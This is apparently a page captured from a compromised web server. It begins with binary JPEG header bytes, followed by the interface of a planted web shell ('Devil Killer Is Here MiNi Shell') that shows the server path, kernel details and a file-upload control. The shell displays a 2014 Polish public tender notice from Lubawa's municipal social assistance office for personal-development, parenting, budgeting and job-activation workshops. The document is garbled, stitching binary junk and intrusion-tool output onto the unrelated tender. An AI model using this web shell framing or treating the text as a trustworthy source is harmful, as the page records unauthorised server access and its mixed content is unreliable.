JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140130/19213-N-2014.html

<p class="kh_header"><b>Lubawa: ORGANIZACJA  I  PRZEPROWADZENIE  USŁUG  EDUKACYJNYCH  I SZKOLENIOWYCH W DZIEDZINIE ROZWOJU OSOBISTEGO dla uczestników projektu PN. AKTYWNA RODZINA realizowanego w 2014r.</b><br>
<b>Numer ogłoszenia: 19213 - 2014; data zamieszczenia: 30.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Gminy Lubawa , Fijewo 73, 14-260 Lubawa, woj. warmińsko-mazurskie, tel. 0-89 6455439, faks 0-89 6455439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopslubawa.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJA  I  PRZEPROWADZENIE  USŁUG  EDUKACYJNYCH  I SZKOLENIOWYCH W DZIEDZINIE ROZWOJU OSOBISTEGO dla uczestników projektu PN. AKTYWNA RODZINA realizowanego w 2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOTEM ZAMÓWIENIA jest:
Organizacja i przeprowadzenie usług edukacyjnych  i szkoleniowych  w dziedzinie rozwoju osobistego w ramach projektu systemowego  pn. Aktywna rodzina  Ośrodka Pomocy Społecznej Gminy Lubawa realizowanego w 2014r. współfinansowanego ze środków Unii  Europejskiej w ramach  Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji  społecznej, Działanie 7.1 Rozwój   i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej - dla dwóch grup Beneficjentów Ostatecznych projektu
Grupy I  - 14 osób (13 Kobiet i 1 Mężczyzna, BO projektu w ramach kontraktów socjalnych),
Grupy II - 11 osób (7 Kobiet i 4 Mężczyzn; BO projektu w ramach kontraktów socjalnych).

PRZEDMIOT ZAMÓWIENIA został podzielony na 3 części zamówienia, z których każda stanowi odrębną część i może być przedmiotem oferty częściowej
CZĘŚĆ  1
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca

Trening interpersonalny (grupowy) - dla uczestników projektu  z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji MARZEC - MAJ/2014r

Trening interpersonalny (grupowy) - dla uczestników projektu z Grupy II  (11 osób) biorących udział  w ramach Kontraktów Socjalnych:
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji MARZEC - MAJ/2014r


Poradnictwo psychologiczne (indywidualne) - dla uczestników projektu  z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych

Ilość godz. - 42 godz./grupa, a 3 godz./osoba (5 godz./m-nie w miesiącach MARZEC - PAŹDZIERNIK/2014r. oraz 2 godz./m-nie w miesiącu LISTOPAD/2014r.)
Okres realizacji MARZEC - LISTOPAD/2014r

CZĘŚĆ 2
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO obejmująca

Warsztaty kompetencji rodzicielskich (grupowe) -  dla uczestników projektu z Grupy I  (14 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji CZERWIEC - SIERPIEŃ/2014r

Warsztaty zarządzania budżetem domowym (grupowe) - dla uczestników        projektu z Grupy I (14 osób) biorących udział  w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Ores realizacji LIPIEC - WRZESIEŃ/2014r
Warsztaty autoprezentacji (grupowe) - dla uczestników projektu z Grupy II   (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji CZERWIEC - SIERPIEŃ/2014r

CZĘŚĆ 3
USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO -  obejmująca

Warsztaty aktywizacji zawodowej (grupowe) - dla uczestników projektu z Grupy I (14 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji WRZESIEŃ  - LISTOPAD/2014r

Warsztaty aktywizacji zawodowej (grupowe) - dla uczestników projektu z Grupy II (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 15 godz. ( 5 godz. x 3 m-ce)
Okres realizacji WRZESIEŃ  - LISTOPAD/2014r

Doradztwo zawodowe (indywidualne) - dla uczestników projektu z Grupy II (11 osób) biorących udział w projekcie w ramach Kontraktów Socjalnych
Ilość godz. - 33 godz./grupa, a 3 godz./osoba (4 godz./m-nie w miesiącach MARZEC - SIERPIEŃ/2014r. oraz 3 godz./m-nie  w miesiącach WRZESIEŃ - LISTOPAD/2014r.)
Okres realizacji: MARZEC - LISTOPAD/2014r

ZAKRES PRZEDMIOTU ZAMÓWIENIA (usługi)

CZĘŚĆ 1 USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO    

TRENING  INTERPERSONALNY (grupowy) - w ramach Kontraktu Socjalnego
Przygotowanie, organizacja i przeprowadzenie Treningu interpersonalnego dla  uczestników projektu z

Grupy I - 14 osób
Grupy II - 11 osób
zgodnie z ustalonym programem i  harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy
rozwijanie kompetencji interpersonalnych, umiejętności współdziałania z ludźmi,
doskonalenie umiejętności zachowania się w trudnych i konfliktowych sytuacjach,
nabycie umiejętności radzenia sobie w trudnych sytuacjach z negatywnymi emocjami,
wzmocnienie poczucia własnej wartości,
rozwijanie asertywności w relacjach interpersonalnych( reagowanie na  krytykę                                i zastrzeżenia, umiejętność odmawiania, wydawania poleceń, stawiania granic                                 i egzekwowania wymagań, umiejętność wyrażania opinii,
doskonalenie umiejętności wychowawczych,
psychologiczny aspekt rozwoju dziecka, świadomość własnych celów wychowawczych,
rodzina jako środowisko opiekuńcze i wychowawcze,
kształtowanie odpowiedniej  postawy społecznej i życiowej,
obowiązki  i role w życiu,
budowanie właściwej hierarchii potrzeb,
umiejętność budowania harmonogramu działań,
budowanie  motywacji i aspiracji społecznych i zawodowych,
budowanie wiary we własne możliwości,
przełamywanie poczucia bezradności,
wprowadzenie do problematyki równości szans kobiet i mężczyzn,
budowanie odpowiedzialności i obowiązkowości.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o :
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty        za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego treningu i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa.


PORADNICTWO  PSYCHOLOGICZNE (indywidualne) - w ramach Kontraktu Socjalnego

Przygotowanie, organizacja i przeprowadzenie Poradnictwa psychologicznego                                dla uczestniczek projektu z
Grupy  I - 14 osób,
zgodnie z ustalonym harmonogramem.
Do głównego obowiązku należeć będzie prowadzenie poradnictwa specjalistycznego, konsultacji                i wsparcia  wg. indywidualnych potrzeb osób objętych projektem.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa                                 w poradnictwie,
rezygnacji uczestnika z udziału w formie wsparcia, pod rygorem odmowy zapłaty                             za poradnictwo,
przeprowadzenia ankiet po zakończeniu poradnictwa w celu zbadania jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego poradnictwa i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa.


CZĘŚĆ 2 USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO     

WARSZTATY KOMPETENCJI RODZICIELSKICH (grupowy) -  w ramach Kontraktu Socjalnego

Przygotowanie, organizacja i przeprowadzenie Warsztaty kompetencji rodzicielskich                          dla uczestniczek projektu z
Grupy  I - 14 osób,
zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien w szczególności zawierać następujące elementy
poprawa komunikacji pomiędzy dziećmi i rodzicami,
wytworzenie relacji współpracy z dzieckiem w realizacji obowiązków,
poznanie skutecznych metod dyscyplinowania bez urażania godności dziecka i rodzica,
ćwiczenie zachowań zachęcających dziecko do samodzielności,
budowanie pozytywnego i realistyczne wyobrażenia dzieci o sobie - umiejętne  stosowanie pochwał
poznanie koncepcji ról przybieranych przez dzieci i sposobów zapobiegania,
nauka wyznaczania zasad i przywilejów w rodzinie,
nauka poprawnej komunikacji (komunikat typu Ja),
uświadomienie, że konflikt może być pozytywny,
odbudowa i wzmacnianie więzi w rodzinie,
uświadomienie, że poprzez zmianę siebie możliwa jest poprawa relacji,

Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty        za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego treningu i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa.

WARSZTATY ZARZĄDZANIA BUDŻETEM DOMOWYM (grupowe) - w ramach Kontraktu Socjalnego:
Przygotowanie, organizacja i przeprowadzenie Warsztatów zarządzania budżetem domowym  dla uczestniczek projektu z
Grupy  I - 14 osób,
zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.

Program szkolenia powinien w szczególności zawierać następujące elementy 
podstawowe zagadnienia ekonomiczne,
definiowanie posiadanych zasobów,
stawianie celów,
planowe i celowe zarządzanie budżetem,
oszczędzanie bez wyrzeczeń,
przykładowy budżet domowy,
indywidualne budżety domowe, techniki zarządzania,
planować domowy budżet i konsekwentnie go realizować,
poprawić swoją sytuację finansową i skutecznie oszczędzać,
radzić sobie w trudnych sytuacjach finansowych,
rozmawiać z dziećmi o pieniądzach.
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
 bieżącego informowania Zamawiającego o :
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty        za szkolenie tych osób,
 przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego warsztatu i przedłożenia Zamawiającemu. 
Miejsce  realizacji:  pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa.

WARSZTATY AUTOPREZENTACJI (grupowe) -  w ramach Kontraktu Socjalnego

Przygotowanie, organizacja i przeprowadzenie Warsztatów autoprezentacji  dla uczestników projektu z
Grupy  II -  11 osób,
zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien obejmować, m. in
poznania siebie i tego, jak chcemy pokazać się innym,
poznanie technik skutecznego komunikowania się z innymi,
odnalezienia najlepszego sposobu na to, żeby być odbieranym zgodnie z naszymi intencjami,
radzenie sobie z lękiem przed wystąpieniami, spotkaniem z pracodawcą,
gesty w kontaktach z innymi ludźmi,
dobre pierwsze wrażenie- powitanie, przedstawianie, wizytówki 
komunikacja - korespondencja, telefon, e-mail,
komunikacja werbalna i niewerbalna,
prezencja - wygląd zewnętrzny
rozmowa kwalifikacyjna,
spotkania - organizacja i przebieg,
Savoir-vivre na co dzień.
Wykonawca będzie zobowiązany do
 prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
 systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty        za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanych warsztatów i przedłożenia Zamawiającemu. 
Miejsce  realizacji  pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa. 


CZĘŚĆ 3 USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO     

WARSZTATY AKTYWIZACJI ZAWODOWEJ (grupowe) -  w ramach Kontraktu Socjalnego

Przygotowanie, organizacja i przeprowadzenie Warsztatów aktywizacji zawodowej dla uczestników projektu z
Grupy  I - 14 osób,
Grupy II -  11 osób,
zgodnie z ustalonym harmonogramem.
Zajęcia powinny mieć charakter warsztatowy z wykorzystaniem aktywnych metod nauczania,                    które pozwolą na umiejętne zastosowanie zdobytej wiedzy w rozwiązywaniu konkretnych problemów.
Program szkolenia powinien obejmować, m. in
rozpoznanie trudności w znalezieniu pracy,
informacja o zawodach, etap motywacji w podjęciu aktywności zawodowej,
określenie własnego potencjału,
analiza rynku pracy, przygotowanie się do podjęcia lub złożenia oferty pracy,
poznanie zasad sporządzania dokumentów aplikacyjnych i metod szukania pracy,
przygotowanie prezentacji własnej kandydatury przyszłemu pracodawcy,
 przygotowanie do rozmowy kwalifikacyjnej,
najczęstsze błędy podczas rozmowy kwalifikacyjnej,
negocjowanie warunków pracy i płacy,
cechy przedsiębiorczego pracownika.
Wykonawca będzie zobowiązany do
 prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
systematycznej oceny postępów uczestników szkolenia,
bieżącego informowania Zamawiającego o 
wszystkich przypadkach nieobecności na szkoleniu osób skierowanych,
rezygnacji uczestnika ze szkolenia w trakcie jego trwania, pod rygorem odmowy zapłaty        za szkolenie tych osób,
przeprowadzenia ankiet po zakończeniu treningu w celu zbadania nabytych umiejętności                    i kompetencji przez uczestników szkolenia oraz jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanych warsztatów i przedłożenia Zamawiającemu. 
Miejsce  realizacji pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa. 

DORADZTWO ZAWODOWE (indywidualne) -  w ramach Kontraktu Socjalnego

Przygotowanie, organizacja i przeprowadzenie Doradztwa zawodowego  dla uczestników projektu z
Grupy  II - 11 osób,
zgodnie z ustalonym harmonogramem.
Program powinien w szczególności zawierać następujące elementy
analiza potencjału osobowościowego i zawodowego uczestników i uczestniczek projektu, 
określenie preferencji zawodowych, 
analiza rynku pracy, 
opracowanie dla każdego uczestnika  i uczestniczki projektu IPD
Wykonawca będzie zobowiązany do
prowadzenia odpowiedniej dokumentacji projektowej oraz stałej współpracy z Ośrodkiem Pomocy Społecznej Gminy Lubawa,
bieżącego informowania Zamawiającego o
wszystkich przypadkach nieobecności osób skierowanych do uczestnictwa                                 w doradztwie,
rezygnacji uczestnika z udziału w formie wsparcia, pod rygorem odmowy zapłaty                             za doradztwo,
przeprowadzenia ankiet po zakończeniu doradztwa w celu zbadania jakości zrealizowanej usługi,
sporządzenia Raportu ze zrealizowanego doradztwa i przedłożenia Zamawiającemu. 
Miejsce  realizacji  pomieszczenia OPS Gminy Lubawa położone w budynku przy                           ul. 19-go Stycznia, 14-260 Lubawa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest spełnienie warunków zawartych w niniejszym Specyfikacji Istotnych Warunków Zamówienia SIWZ oraz art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zwanej dalej ustawą Pzp. 
O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy
Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
Następujące oświadczenia i dokumenty
W celu potwierdzenia spełnienia warunku, o którym mowa w PKT. 9 ppkt.   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt.2 ustawy.
Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub, że uzyskał przewidziane prawem odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu  w całości wykonania decyzji organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub  potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu w całości wykonania decyzji organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W przypadku zlecania części zamówienia podwykonawcom oświadczenie w sprawie realizacji zamówienia przy współudziale podwykonawców stanowiące Załącznik nr 6 do SIWZ. 
Wyżej wymienione dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest spełnienie warunków zawartych w niniejszym Specyfikacji Istotnych Warunków Zamówienia SIWZ oraz art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zwanej dalej ustawą Pzp. 
O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia i wykażą że w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie przeprowadzili co najmniej 2 szkolenia usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach poszczególnych części zamówienia dla klientów  pomocy społecznej Miejskich Ośrodków Pomocy Społecznej, Gminnych Ośrodków Pomocy Społecznej, Powiatowych Centrów Pomocy Społecznej, potwierdzone pozytywnymi referencjami z MOPS, GOPS, PCPR tj
CZĘŚĆ 1 
co najmniej 2 usługi z zakresu Warsztatów lub treningu interpersonalnego lub Warsztatów lub treningu kompetencji i umiejętności społecznych  oraz co najmniej  2 usługi  z zakresu Terapii lub poradnictwa psychologicznego 
CZĘŚĆ 2
co najmniej 2 usługi z zakresu Treningu lub warsztatów kompetencji rodzicielskich lub innych zajęć w ramach których były prowadzone zajęcia z zakresu kompetencji rodzicielskich oraz 2 usługi z zakresu Treningu lub warsztatów zarządzania budżetem domowym lub innych zajęć w ramach których były prowadzone zajęcia z zakresu zarządzania budżetem domowym i 2 usługi z zakresu Terapii lub warsztatów autoprezentacji  lub innych zajęć w ramach których były prowadzone zajęcia z zakresu autoprezentacji,
CZĘŚĆ 3 
co najmniej 2 usługi z zakresu Warsztatów aktywizacji zawodowej oraz 2 usługi z zakresu Poradnictwa lub doradztwa zawodowego.
dysponują osobami które posiadają wykształcenie niezbędne do realizacji poszczególnych warsztatów, treningów, poradnictwa, doradztwa, w ramach części przedmiotu zamówienia oraz doświadczenie zawodowe, tj przeprowadzili w okresie 5 lat przed dniem składania ofert co najmniej  2 usługi warsztaty, treningi, poradnictwa, doradztwa odpowiadające  swoim rodzajem usługom stanowiącym przedmiot zamówienia w ramach poszczególnych części zamówienia.
